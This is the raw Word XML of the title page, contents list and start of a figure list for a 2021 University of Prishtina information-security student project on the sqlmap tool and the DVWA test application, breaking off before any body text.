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3FFE2" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Universiteti i Prishtinës “Hasan Prishtina”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274C65BB" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:spacing w:before="196"/>
        <w:ind w:left="718" w:right="619"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Fakulteti Inxhinierisë Elektrike dhe Kompjuterike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E78EAD" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26595139" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8DD165" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02280466" wp14:editId="543D5E52">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2981617</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>191359</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1940079" cy="174974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40079" cy="1749742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6F9CB" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="47"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C99C04" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:ind w:left="718" w:right="619"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Dokumentim teknik i projektit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7312ED" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AA0741" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="37"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE53DCD" w14:textId="6E674A68" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lënda: Siguria </w:t>
      </w:r>
      <w:r w:rsidR="00E8469B">
        <w:t>e Informacionit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80BE9C" w14:textId="578AE605" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Titulli i projektit: </w:t>
      </w:r>
      <w:r w:rsidR="00E8469B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009F3CDF">
        <w:t>qlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D380B" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FBE1E0" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55152D29" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28724F1E" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445207D7" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A03AA0F" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3819"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Emri profesorit/Asistentit</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Emri &amp; mbiemri studentëve / email adresa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199FCAF5" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="15"/>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72"/>
        <w:gridCol w:w="2552"/>
        <w:gridCol w:w="3826"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C0AEA" w14:paraId="2A9B56E9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="248"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2972" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="1F7D2FD0" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="112" w:right="502"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Prof. Dr. Blerim REXHA PhD.c Mërgim H. HOTI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20A007D8" w14:textId="7D49E843" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="228" w:lineRule="exact"/>
              <w:ind w:left="112"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidR="000A30DB">
              <w:t>Egzona</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000A30DB">
              <w:t>Grashtica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3826" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3659B5AC" w14:textId="56E83B59" w:rsidR="009C0AEA" w:rsidRPr="00101AE1" w:rsidRDefault="000A30DB" w:rsidP="00101AE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101AE1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00101AE1" w:rsidRPr="00101AE1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00101AE1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>gzon</w:t>
            </w:r>
            <w:r w:rsidR="00E8469B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00101AE1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>.grashtica@student.uni-pr.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C0AEA" w14:paraId="6FE2382B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="248"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2972" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2461F0CD" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C5FBF3D" w14:textId="02218FEA" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="228" w:lineRule="exact"/>
              <w:ind w:left="112"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="000A30DB">
              <w:t xml:space="preserve"> Leand Thaçi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3826" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60386E09" w14:textId="3AD4ABE6" w:rsidR="009C0AEA" w:rsidRDefault="000A30DB">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="005016C7" w:rsidRPr="00E927A3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>leand.thaci@student.uni-pr.edu</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C0AEA" w14:paraId="6A91A5C3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="247"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2972" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5491AED9" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73EDA3F4" w14:textId="0A94BA07" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="228" w:lineRule="exact"/>
              <w:ind w:left="112"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="000A30DB">
              <w:t xml:space="preserve"> Rrezarta Sallauka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3826" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EB7C1C5" w14:textId="76B4C8C4" w:rsidR="009C0AEA" w:rsidRPr="000A30DB" w:rsidRDefault="000A30DB">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000A30DB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> rrezarta.sallauka@student.uni-pr.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53C670CA" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE1E70C" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:ind w:left="718" w:right="619"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Prishtinë, 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69A641" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="009C0AEA">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1380" w:right="1320" w:bottom="280" w:left="1220" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1BDEDB" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B417031" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2879F293" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695BC505" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:t>Përmbajtja</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:id w:val="394627373"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="00A245EF" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9569"/>
            </w:tabs>
            <w:spacing w:before="32"/>
            <w:ind w:left="220" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Carlito"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">TOC \o "1-1" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_TOC_250005" w:history="1">
            <w:r>
              <w:t>Abstrakti</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/>
                <w:b w:val="0"/>
                <w:position w:val="1"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C6191A0" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="00BE41BB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="2"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="659"/>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:pos="9569"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Carlito"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_TOC_250004" w:history="1">
            <w:r w:rsidR="003B7A3C">
              <w:t>Hyrje</w:t>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/>
                <w:b w:val="0"/>
                <w:position w:val="1"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="761CA2FB" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="00BE41BB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="2"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="879"/>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:pos="9569"/>
            </w:tabs>
            <w:spacing w:before="122"/>
            <w:ind w:left="880" w:hanging="660"/>
            <w:rPr>
              <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_TOC_250003" w:history="1">
            <w:r w:rsidR="003B7A3C">
              <w:t>Qëllimi i punimit</w:t>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:rPr>
                <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                <w:b w:val="0"/>
                <w:position w:val="1"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43A5664D" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="00BE41BB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="2"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="879"/>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:pos="9569"/>
            </w:tabs>
            <w:ind w:left="880" w:hanging="660"/>
            <w:rPr>
              <w:rFonts w:ascii="Carlito"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_TOC_250002" w:history="1">
            <w:r w:rsidR="003B7A3C">
              <w:t>Pjesa kryesore</w:t>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/>
                <w:b w:val="0"/>
                <w:position w:val="1"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B528033" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="00BE41BB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="2"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="879"/>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:pos="9569"/>
            </w:tabs>
            <w:ind w:left="880" w:hanging="660"/>
            <w:rPr>
              <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_TOC_250001" w:history="1">
            <w:r w:rsidR="003B7A3C">
              <w:t>Konkluzione (apo përfundim)</w:t>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:rPr>
                <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                <w:b w:val="0"/>
                <w:position w:val="1"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="670CF167" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="00BE41BB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9569"/>
            </w:tabs>
            <w:ind w:left="220" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Carlito"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_TOC_250000" w:history="1">
            <w:r w:rsidR="003B7A3C">
              <w:t>Referencat</w:t>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003B7A3C">
              <w:rPr>
                <w:rFonts w:ascii="Carlito"/>
                <w:b w:val="0"/>
                <w:position w:val="1"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7695E431" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="30C66A06" w14:textId="452D2D68" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA"/>
    <w:p w14:paraId="7133D881" w14:textId="1096D845" w:rsidR="00BF613E" w:rsidRPr="00BF613E" w:rsidRDefault="00BF613E" w:rsidP="00BF613E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF613E">
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:t>Tabela e figurave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F37702" w14:textId="77777777" w:rsidR="00BF613E" w:rsidRDefault="00BF613E"/>
    <w:p w14:paraId="2D039CFF" w14:textId="4024B44F" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figura" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc91427371" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 1 Aplikacioni DVWA</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427371 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EAAA16C" w14:textId="094CD2B1" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427372" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 2 Krijimi i databazës testuese në mënyrë automatike</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427372 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72FFB4AD" w14:textId="7F7FCF2A" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427373" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
